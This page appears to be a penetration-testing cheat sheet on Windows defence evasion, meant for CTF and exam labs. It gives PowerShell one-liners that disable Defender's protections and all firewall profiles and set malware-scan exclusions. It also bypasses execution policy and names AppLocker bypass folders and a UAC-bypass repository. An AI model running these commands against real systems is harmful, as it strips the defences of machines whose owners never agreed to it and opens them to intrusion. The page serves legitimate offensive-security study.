bazaar
Windows
Defence Evasion

Defence Evasion

Caution

Only use these in controlled test environments which can be reset easily (eg. CTFs, boot2root, Offsec Exams)

Disabling defences

Disable defender, all firewall rules and set execution policy to unrestricted:

Set-ExecutionPolicy Unrestricted;Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference;

Execution Policy blocking commands 

powershell -noexit -ExecutionPolicy Bypass [optional cmd you wish to run]

# show execution policy
Get-ExecutionPolicy

# remove execution policy
Set-ExecutionPolicy Unrestricted

Firewall 

# Disable all Firewall profiles (Requires Admin privileges).
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Set-NetFirewallProfile -Enabled False

Defender 

# Turn off everything and set exclusion to "C:\Windows\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference 

# -----

# Check if Defender is enabled
Get-MpComputerStatus
Get-MpComputerStatus | Select AntivirusEnabled

# Check if defensive modules are enabled
Get-MpComputerStatus | Select RealTimeProtectionEnabled, IoavProtectionEnabled,AntispywareEnabled | FL

# Check if tamper protection is enabled
Get-MpComputerStatus | Select IsTamperProtected,RealTimeProtectionEnabled | FL

# -----

# Disables realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

# Disables scanning for downloaded files or attachments
Set-MpPreference -DisableIOAVProtection $true

# Disable behaviour monitoring
Set-MPPreference -DisableBehaviourMonitoring $true

# Make exclusion for a certain folder
Add-MpPreference -ExclusionPath "C:\Windows\Temp"

# Disables cloud detection
Set-MPPreference -DisableBlockAtFirstSeen $true

# Disables scanning of .pst and other email formats
Set-MPPreference -DisableEmailScanning $true

# Disables script scanning during malware scans
Set-MPPReference -DisableScriptScanning $true

# Exclude files by extension
Set-MpPreference -ExclusionExtension "ps1"

Ref: https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/defense-evasion/disable-defender#firewall

AppLocker 

C:\windows\tasks

C:\Windows\System32\spool\drivers\color

Ref: https://github.com/api0cradle/UltimateAppLockerByPassList/tree/master?tab=readme-ov-file

UAC Bypass

The repo below has a great list of UAC bypasses to use in various condition (GUI, DLL hijack, etc). Easily modifiable to create a BOF or tool which does the same thing.

Defeating Windows User Account Control Ref: https://github.com/hfiref0x/UACME

Post Exploitation & Looting